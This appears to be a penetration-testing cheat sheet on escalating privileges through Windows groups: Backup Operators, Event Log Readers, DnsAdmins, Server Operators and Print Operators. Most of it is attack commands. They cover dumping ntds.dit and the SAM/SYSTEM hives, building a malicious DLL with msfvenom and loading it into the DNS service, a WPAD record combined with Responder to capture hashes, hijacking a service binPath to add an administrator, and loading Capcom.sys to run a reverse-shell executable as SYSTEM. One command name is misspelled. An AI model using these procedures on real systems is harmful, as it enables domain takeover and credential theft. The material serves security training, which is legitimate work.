Windows Group Privileges

Backup Operators

Membership of this group grants its members the SeBackup and SeRestore privileges. The SeBackupPrivilege allows us to traverse any folder and list the folder contents.

Importing Libraries

We can use this PoC to exploit the SeBackupPrivilege, and copy this file. First, let's import the libraries in a PowerShell session.

PowerShell

PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dll

Verifying SeBackupPrivilege is Enabled

PowerShell

PS> whoami /all
PS> Get-SeBackupPrivilege

## Enabling the SeBackupPrivilege
PS> Set-SeBackupPrivilege

Copying a Protected File

PowerShell

PS> Copy-FileSeBackupPrivilege '<path> <file>' .\file.txt

## Using Diskshadow
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

PS> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

## Backing up SAM and SYSTEM Registry Hives
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive

## Copying files with RoboCopy
cmd> robocopy /B E:\Windows\NTDS .\ntds ntds.dit

Event Log Readers

Members of this group can read event logs from local machine

Searching Security Logs Using wevtutil

PowerShell

# Searching Security Logs Using wevtutil
wevtutil qe Security /rd:true /f:text | Select-String "/user"

# Passing Credentials to wevtutil
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

Searching Security Logs Using Get-WinEvent

Searching the Security event log with Get-WInEvent requires administrator access or permissions adjusted on the registry key HKLM\System\CurrentControlSet\Services\Eventlog\Security. Membership in just the Event Log Readers group is not sufficient.

For Get-WinEvent, the syntax is as follows. In this example, we filter for process creation events (4688), which contain /user in the process command line.

PowerShell

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

DnsAdmins

Members of the DnsAdmins group have access to DNS information on the network. The DNS service runs as NT AUTHORITY\SYSTEM, so membership in this group could potentially be leveraged to escalate privileges on a Domain Controller or in a situation where a separate server is acting as the DNS server for the domain.

Creating a malicious DLL

First Step

In the attacker machine we can generate a malicious DLL to add a user to the domain admins group using msfvenom.

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

Second Step

Only members of the DnsAdmins group are permitted to do this.

After downloading the file to the target, we use the dnscmd utility to load a custom DLL.

dnscmd.exe /config /serverlevelplugindll <path>\adduser.dll

Third Step

First, we need our user's SID.

wmic useraccount where "name='netadm'" get sid

Once we have the user's SID, we can use the sc command to check permissions on the service. Our user needs to have RPWP permissions which translate to SERVICE_START and SERVICE_STOP

sc.exe sdshow DNS

Fourth Step

RUN THIS USING CMD

After confirming these permissions, we can issue the following commands to stop and start the service.

sc stop dns
sc start dns

If all goes to plan, our account will be added to the Domain Admins group or receive a reverse shell if our custom DLL was made to give us a connection back.

Creating a WPAD Record

Another way to abuse DnsAdmins group privileges is by creating a WPAD record. Membership in this group gives us the rights to disable global query block security, which by default blocks this attack.

After disabling the global query block list and creating a WPAD record, every machine running WPAD with default settings will have its traffic proxied through our attack machine. We could use a tool such as Responder or Inveigh to perform traffic spoofing, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.

Victim Machine

To set up this attack, we first disabled the global query block list using PowerShell.

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <hostname>

Next, we add a WPAD record pointing to our attack machine.

dd-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName <hostname> -IPv4Address <ip>

Attacker Machine

Start the responder

sudo responder -I tun0

Server Operators

The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.

Querying the Service

Find the services running as SYSTEM

sc query | findstr SERVICE_NAME

First of all, we have to confirm if the service starts as SYSTEM, for it we can use sc.exe utility.

sc qc <service>

We can use the service viewer/controller PsService, which is part of the Sysinternals suite, to check permissions on the service

.\PsService.exe security <service>

If we have SERVICE_ALL_ACCESS access right, which gives us full control over this service.

Modifying the Service Binary Path

Let's change the binary path to execute a command which adds our current user to the default local administrators group.

sc config <service> binPath= "cmd /c net localgroup Administrators <user> /add"

And finally start the service

sc start <service>

Print Operators

The Print Operators group is a highly privileged group in Windows that grants its members several significant permissions, including:

• SeLoadDriverPrivilege: Allows members to load and manage system drivers.

• The ability to manage, create, share, and delete printers connected to a Domain Controller.

• The ability to log on locally to a Domain Controller and shut it down.

Given these privileges, members of this group can load system drivers, enabling them to exploit the system further.

Using Capcom.sys for Privilege Escalation

The Capcom.sys driver is a well-known driver that allows users to execute shell code with system privileges. This driver can be particularly useful for escalating privileges in a Windows environment.

Download the Capcom.sys Driver

The Capcom.sys driver can be downloaded from the following GitHub repository:

• Capcom-Rootkit - Capcom.sys

Additionally, you can find useful tools such as LoadDriver.ex and ExploitCapcom.exe in the following repository:

• SeLoadDriverPrivilege - Josh Morrison

Create a Malicious Executable:

Using msfvenom, create a malicious executable (e.g., rev.exe) that will provide a reverse shell when executed. This executable will be run with elevated privileges after loading the Capcom.sys driver.

Load the Capcom.sys Driver:

Use the LoadDriver.exe tool to load the Capcom.sys driver. The command syntax is as follows:

.\LoadDriver.exe System\CurrentControlSet\MyService C:\Users\Test\Capcom.sys

Upon successful execution, this command should return NTSTATUS: 00000000, WinError: 0. If it does not, check the location of Capcom.sys or ensure that you are executing LoadDriver.exe from the correct directory.

Execute the Malicious Executable:

After successfully loading the driver, use ExploitCapcom.exe to execute your malicious executable with elevated privileges:

.\ExploitCapcom.exe C:\Windows\Place\to\reverseshell\rev.exe

This command runs the rev.exe file with system privileges, providing the attacker with a reverse shell.